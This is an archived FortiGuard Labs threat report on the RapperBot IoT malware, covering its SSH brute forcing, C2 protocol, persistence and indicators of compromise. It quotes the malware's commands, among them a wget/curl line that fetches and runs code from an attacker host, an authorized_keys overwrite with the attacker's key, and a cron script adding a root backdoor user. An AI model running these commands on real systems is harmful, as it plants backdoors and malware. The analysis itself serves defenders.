{
	"id": "c0238ad0-ce31-4abd-a74c-106fa4bdd2ca",
	"created_at": "2026-04-06T00:15:54.214452Z",
	"updated_at": "2026-04-10T03:25:15.73777Z",
	"deleted_at": null,
	"sha1_hash": "e763a6edb334a546e2aeb50d66c28991b1601af2",
	"title": "So RapperBot, What Ya Bruting For? | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 605767,
	"plain_text": "So RapperBot, What Ya Bruting For? | FortiGuard Labs\r\nPublished: 2022-08-03 · Archived: 2026-04-05 17:31:32 UTC\r\nFortiGuard Labs has been tracking a rapidly evolving IoT malware family known as “RapperBot” since mid-June 2022. This\r\nfamily borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its\r\nbuilt-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai.\r\nIn addition, recent samples show that its developers have started adding code to maintain persistence, which is rarely done in\r\nother Mirai variants. This provides threat actors with continued access to infected devices via SSH even after the device is\r\nrebooted or the malware has been removed.\r\nAffected Platforms: Linux\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: Critical\r\nThis article reveals how this threat infects and persists on a victim device, as well as interesting changes that make us\r\nquestion the real intention of the threat actors.\r\nDiscovery\r\nIn June 2022, FortiGuard Labs encountered IoT malware samples with SSH-related strings, something not often seen in\r\nother IoT threat campaigns. What piqued our interest more was the size of the code referencing these strings in relation to\r\nthe code used for DDoS attacks, which usually comprises most of the code in other variants.\r\nUpon further analysis, we discovered that this malware family, dubbed \"RapperBot,” is designed to function primarily as an\r\nSSH brute forcer with limited DDoS capabilities. As is typical of most IoT malware, it targets ARM, MIPS, SPARC, and\r\nx86 architectures.\r\nThe name “RapperBot” comes from an early July report from CNCERT where an embedded URL to a YouTube rap music\r\nvideo was found in older samples. The samples of RapperBot released after this report do not contain this URL.\r\nHello From the Other Side\r\nRapperBot heavily reuses parts of the Mirai source code, but its features and implementation details, e.g., the Command \u0026\r\nControl (C2) command protocol, differs significantly from the original Mirai and typical Mirai-based variants monitored by\r\nFortiGuard Labs.\r\nUnlike the majority of Mirai variants, which natively brute force Telnet servers using default or weak passwords, RapperBot\r\nexclusively scans and attempts to brute force SSH servers configured to accept password authentication. The bulk of the\r\nmalware code contains an implementation of an SSH 2.0 client that can connect and brute force any SSH server that\r\nsupports Diffie-Hellmann key exchange with 768-bit or 2048-bit keys and data encryption using AES128-CTR.\r\nA distinctive feature of the brute forcing implementation in RapperBot is the use of “SSH-2.0-HELLOWORLD” to identify\r\nitself to the target SSH server during the SSH Protocol Exchange phase. The appearance of this RapperBot in mid-June\r\ncoincides with the observation of this same client identification string by SANS Internet Storm Center in their honeypot\r\nlogs.\r\nEarlier samples had the brute-forcing credential list hardcoded into the binary. From July onwards, samples now retrieve this\r\nlist from another port on the C2 server. This allows the threat actors to continually add new SSH credentials without having\r\nto update infected devices with new samples. This port number ranges from 4343 to 4345 in the latest samples.\r\nOnce RapperBot successfully brute forces an SSH server, the valid credentials are reported to the C2 server on a separate\r\nport (currently 48109) without executing further commands on the remote victim.\r\nIn late June, however, FortiGuard Labs found some samples that attempted to self-propagate via a remote binary downloader\r\npost-compromise. The commands executed on the compromised SSH server are shown below.\r\nsh\r\nenable\r\nshell\r\ndebug shell\r\ncmd\r\nwget http://2[.]58[.]149[.]116/w -O- | sh; curl http://2[.]58[.]149[.]116/c -O- |  sh\r\nhttps://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nPage 1 of 6\n\nFor unknown reasons, this propagation functionality was removed in samples collected a few days later and has not been\r\nseen in subsequent samples. As with the original Mirai, we suspect the threat actors have implemented a separate loader\r\nsystem that would subsequently connect to the victim to download and execute the bot client.\r\nNever Gonna Give You Up\r\nSince mid-July, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH\r\nservers. It runs a shell command to replace remote victims’ ~/.ssh/authorized_keys with one containing the threat actors’\r\nSSH public key with the comment “helloworld,” as shown below.\r\ncd ~ \u0026\u0026 rm -rf .ssh \u0026\u0026 mkdir .ssh \u0026\u0026 echo \"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPem\r\nHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73\r\nqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4\r\nFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6bt\r\nZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x\r\n2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== helloworld\"\u003e\u003e.ssh/authorized_keys \u0026\u0026 chmod -R\r\ngo= ~/.ssh \u0026\u0026 cd ~;\r\nPublic keys stored in ~/.ssh/authorized_keys allow anyone with the corresponding private key to connect and authenticate to\r\na SSH server without needing to supply a password. This presents a threat to compromised SSH servers as threat actors can\r\naccess them even after SSH credentials have been changed or SSH password authentication is disabled. Moreover, since the\r\nfile is replaced, all existing authorized keys are deleted, which prevents legitimate users from accessing the SSH server via\r\npublic key authentication.\r\nApart from maintaining access to every SSH server that it brute forces, RapperBot is also very intent on retaining its\r\nfoothold on any devices on which it is executed. Samples from mid-July append the same aforementioned SSH key to the\r\nlocal \"~/.ssh/authorized_keys\" on the infected device upon execution. This allows RapperBot to maintain its access to these\r\ninfected devices via SSH even after a device reboot or the removal of RapperBot from the device – something that is\r\natypical to most Mirai variants. In an attempt to better hide in plain sight, the latest samples use a more innocuous comment\r\n\"system key generated by server 20220709\" for the public key instead of “helloworld.”\r\nIn the latest RapperBot samples, the malware also started adding the root user \"suhelper” to the infected device by directly\r\nwriting to “/etc/passwd” and “/etc/shadow/”, further allowing the threat actor to take complete control of the device. In\r\nconjunction, it adds the root user account every hour by writing the following script to “/etc/cron.hourly/0” in the event that\r\nother users (or botnets) attempt to remove their account from the victim system. The command to add the root user is\r\nprovided below.\r\n#!/bin/sh\r\nuseradd -u 0 -g 0 -o -d / suhelper -p '$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/' \u003e/dev/null 2\u003e\u00261\r\nFigure 1 illustrates how the latest samples of RapperBot work. Dotted lines indicate potential actions that FortiGuard Labs\r\nassesses that the threat actor could perform but have not been observed in the wild.\r\nFigure 1: RapperBot execution flow\r\nhttps://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nPage 2 of 6\n\nYou Can’t See Me\r\nWhile early samples had strings in plaintext, subsequent samples added extra obfuscation to the strings by building them on\r\nthe stack. This prevents common analysis tools and detection techniques from extracting human-readable strings from\r\nbinary files (Figure 2).\r\nFigure 2: String encoding in RapperBot samples\r\nFurthermore, these latest samples implemented an additional layer of Mirai-style XOR encoding to hide these strings from\r\nmemory scanners during execution.\r\nWhile most Mirai and Gafgyt botnet operators, like Keksec, tend to include strings identifying themselves within the\r\nmalware samples, the developers of this malware maintain a relatively low profile (apart from occasional references to rap\r\nmusic).\r\nNetwork Protocol\r\nRapperBot communicates with its C2 server via TCP requests at separate ports to receive commands (443 in the latest\r\nsamples), download SSH credential lists, or report valid credentials during SSH brute forcing.\r\nThe network protocol for commands is explained in further detail below.\r\nEach request contains a bot ID, a 32-byte value hardcoded in the binary. FortiGuard Labs observed two IDs as follows:\r\nd4 1c 74 44 70 95 28 ff f0 98 ae 4e 6f 92 ba d5 0f cd 56 29 c5 12 53 a1 fe 46 53 c7 0b b5 18 27\r\nf6 b7 0b 00 14 77 35 f9 8d 6d 5d c4 bd 23 88 7e cf 5e 02 ce 54 5f e7 b1 e6 3f 2a 16 71 b6 eb 9a (a separate cluster seen only\r\nin late December 2021)\r\nAs a side note, pivoting on these bot IDs allowed us to find older samples from November 2021. However, the SSH brute\r\nforcing capability was only seen in samples from mid-June 2022.\r\nRapperBot starts by sending a registration packet to the C2 server. This includes the argument (referred to as “source” by\r\nMirai) used when the binary was executed in the victim system, which usually provides some basic contextual info about its\r\nexecution. For instance, “ssh.wget.arm7” would tell the C2 that the binary was spread via SSH protocol, downloaded via the\r\nwget utility, and is of ARM architecture.\r\nThe succeeding communication uses the following structure:\r\nstruct rapperbot_registration {\r\n    byte bot_id[32];\r\n    int command_code;\r\n    source [32];\r\n};\r\nHere are the command codes supported by RapperBot:\r\nhttps://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nPage 3 of 6\n\n0x00: Register (used by the client)\r\n0x01: Keep-Alive/Do nothing\r\n0x02: Stop all DoS attacks and terminate the client\r\n0x03: Perform a DoS attack\r\n0x04: Stop all DoS attacks\r\nRight after the registration packet, the client sends another request to notify the C2 that the client is ready to receive\r\ncommands. The C2 server usually responds with a keep-alive command to acknowledge the request (Figure 3).\r\nFigure 3: RapperBot client-server communication\r\nBesides the keep-alive command, we did not observe any other commands from the C2 server during our analysis.\r\nHowever, RapperBot does support a very minimal set of DoS attacks, including plain UDP and TCP STOMP flood attacks\r\nthat are very similar to Mirai’s implementation.\r\nThe attack command structure is as follows:\r\nstruct rapperbot_attack_command {\r\n    byte bot_id[32];\r\n    int command_code;  // 0x03\r\n    byte vector; // type of DoS attack\r\n    ushort target_port;\r\n    int duration;\r\n    int target_ip;\r\n};\r\n \r\nMystery Motivation\r\nFortiGuard Labs has been monitoring this threat for over a month. During that time, it has undergone several interesting\r\nchanges that raise more questions than answers when attempting to pinpoint the primary motivation of the threat actors in\r\nlaunching this campaign.\r\nAt one point, samples were observed where the DDoS attack capabilities were entirely removed and added back a week\r\nlater. Could the DDoS functionality have been retained for masquerading as a typical DDoS botnet to avoid drawing too\r\nmuch attention? It is also possible that this whole campaign is still a work in progress.\r\nAdditionally, self-propagation was removed after a few days in late June, with the current focus on aggressively retaining\r\ncontinued access to brute-forced SSH servers. Are the threat actors more interested in collecting compromised SSH devices\r\nthan expanding their botnet?\r\nOn top of that, we have not seen additional payloads delivered after brute forcing. We can only speculate on why the threat\r\nactors are amassing a rapidly growing collection of compromised SSH servers. Over 3,500 unique IPs have been observed in\r\nthe past 1.5 months attempting to scan and brute-force SSH servers with the SSH-2.0-HELLOWORLD client identification\r\nstring. IPs from the US, Taiwan, and South Korea comprised half of the observed IPs (Figure 4).\r\nhttps://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nPage 4 of 6\n\nFigure 4: Scanner IP Count from mid-June 2022 to late July 2022\r\nConclusion\r\nAlthough this threat heavily borrows code from Mirai, it has features that set it apart from its predecessor and its variants. Its\r\nability to persist in the victim system gives threat actors the flexibility to use them for any malicious purpose they desire.\r\nDue to some significant and curious changes that RapperBot has undergone, its primary motivation is still a bit of a mystery.\r\nRegardless, since its primary propagation method is brute forcing SSH credentials, this threat can easily be mitigated by\r\nsetting strong passwords for devices or disabling password authentication for SSH (where possible).\r\nFortiGuard Labs will continue to monitor RapperBot’s development.\r\nFortinet Protections\r\nFortinet customers are protected by the following:\r\nThe FortiGuard Antivirus service detects and blocks this threat as ELF/Mirai and Linux/Mirai.\r\nThe FortiGuard Web Filtering Service blocks the C2 servers and downloaded URLs.\r\nFortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source\r\nIP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global\r\nsources that collaborate to provide up-to-date threat intelligence about hostile sources.\r\nIOCs\r\nFiles\r\n92ae77e9dd22e7680123bb230ce43ef602998e6a1c6756d9e2ce5822a09b37b4\r\na31f4caa0be9e588056c92fd69c8ac970ebc7e85a68615b1d9407a954d4df45d\r\ne8d06ac196c7852ff71c150b2081150be9996ff670550717127db8ab855175a8\r\n23a415d0ec6d3131f1d537836d3c0449097e98167b18fbdbf2efca789748818a\r\nc83f318339e9c4072010b625d876558d14eaa0028339db9edf12bbcafe6828bb\r\n05c78eaf32af9647f178dff981e6e4e43b1579d95ccd4f1c2f1436dbfa0727ad\r\n88bbb772b8731296822646735aacbfb53014fbb7f90227b44523d7577e0a7ce6\r\ne8f1e8ec6b94ea54488d5f714e71e51d58dcdfe4be3827c55970d6f3b06edf73\r\n23256f231f3d91b0136b44d649b924552607a29b43a195024dbe6cde5b4a28ad\r\n77b2e5fb5b72493bde35a6b29a66e6250b6a5a0c9b9c5653957f64a12c793cd5\r\ndcdeedee4736ec528d1a30a585ec4a1a4f3462d6d25b71f6c1a4fef7f641e7ae\r\nebb860512a55c1cdc8be1399eec44c4481aedb418f15dbda4612e6d38e9b9010\r\n9d234e975e4df539a217d1c4386822be1f56cea35f7dd2aa606ae4995894da42\r\n1975851c916587e057fa5862884cbac3fa1e80881ddd062392486f5390c86865\r\nhttps://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nPage 5 of 6\n\n8380321c1bd250424a0a167e0f319511611f73b53736895a8d3a2ad58ffcd5d5\r\nf5ff9d1261af176d7ff1ef91aa8c892c70b40caa02c17a25de22539e9d0cdd26\r\n2298071b6ba7baa5393be064876efcdbd9217c212e0c764ba62a6f0ffc83cc5a\r\n2479932a6690f070fa344e5222e3fbb6ad9c880294d5b822d7a3ec27f1b8b8d5\r\n1d5e6624a2ce55616ef078a72f25c9d71a3dbc0175522c0d8e07233115824f96\r\n746106403a98aea357b80f17910b641db9c4fedbb3968e75d836e8b1d5712a62\r\nddf5aff0485f395c7e6c3de868b15212129962b4b9c8040bef6679ad880e3f31\r\ne56edaa1e06403757e6e2362383d41db4e4453aafda144bb36080a1f1b899a02\r\n55ff25b090dc1b380d8ca152428ba28ec14e9ef13a48b3fd162e965244b0d39b\r\n8e9f87bb25ff83e4ad970366bba47afb838028f7028ea3a7c73c4d08906ec102\r\nd86d158778a90f6633b41a10e169b25e3cb1eb35b369a9168ec64b2d8b3cbeec\r\nff09cf7dfd1dc1466815d4df098065510eec504099ebb02b830309067031fe04\r\nDownload URLs\r\nhxxp://31[.]44[.]185[.]235/x86\r\nhxxp://31[.]44[.]185[.]235/mips\r\nhxxp://31[.]44[.]185[.]235/arm7\r\nhxxp://2[.]58[.]149[.]116/arm\r\nhxxp://2[.]58[.]149[.]116/spc\r\nhxxp://2[.]58[.]149[.]116/mips\r\nhxxp://2[.]58[.]149[.]116/x86_64\r\nhxxp://2[.]58[.]149[.]116/ssh/arm7\r\nhxxp://2[.]58[.]149[.]116/ssh/mips\r\nhxxp://2[.]58[.]149[.]116/ssh/x86\r\nhxxp://2[.]58[.]149[.]116/ssh/spc\r\nhxxp://194[.]31[.]98[.]244/ssh/new/spc\r\nhxxp://194[.]31[.]98[.]244/ssh/new/x86\r\nhxxp://194[.]31[.]98[.]244/ssh/new/mips\r\nhxxp://194[.]31[.]98[.]244/ssh/new/arm7\r\nhxxp://194[.]31[.]98[.]244/ssh/new/arm\r\nhxxp://194[.]31[.]98[.]244/ssh/new/x86\r\nhxxp://194[.]31[.]98[.]244/ssh/new/mips\r\nhxxp://194[.]31[.]98[.]244/ssh/new/arm7\r\nhxxp://194[.]31[.]98[.]244/ssh/new/arm\r\nhxxp://185[.]225[.]73[.]196/ssh/new/arm\r\nhxxp://185[.]225[.]73[.]196/ssh/new/arm7\r\nhxxp://185[.]225[.]73[.]196/ssh/new/mips\r\nhxxp//185[.]225[.]73[.]196/ssh/new/x86\r\nC2\r\n31[.]44[.]185[.]235\r\n2[.]58[.]149[.]116\r\n194[.]31[.]98[.]244\r\n185[.]225[.]73[.]196\r\nThreat Actor SSH public key\r\nAAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIR\r\nGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFY\r\nNBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p\r\ngiIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4\r\nBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EO\r\nThreat Actor root user\r\n/etc /passwd suhelper:x:0:0::/:\r\n/etc /shadow suhelper:$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/:19185:0:99999:7:::\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nSource: https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nhttps://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery"
	],
	"report_names": [
		"rapperbot-malware-discovery"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434554,
	"ts_updated_at": 1775791515,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e763a6edb334a546e2aeb50d66c28991b1601af2.pdf",
		"text": "https://archive.orkl.eu/e763a6edb334a546e2aeb50d66c28991b1601af2.txt",
		"img": "https://archive.orkl.eu/e763a6edb334a546e2aeb50d66c28991b1601af2.jpg"
	}
}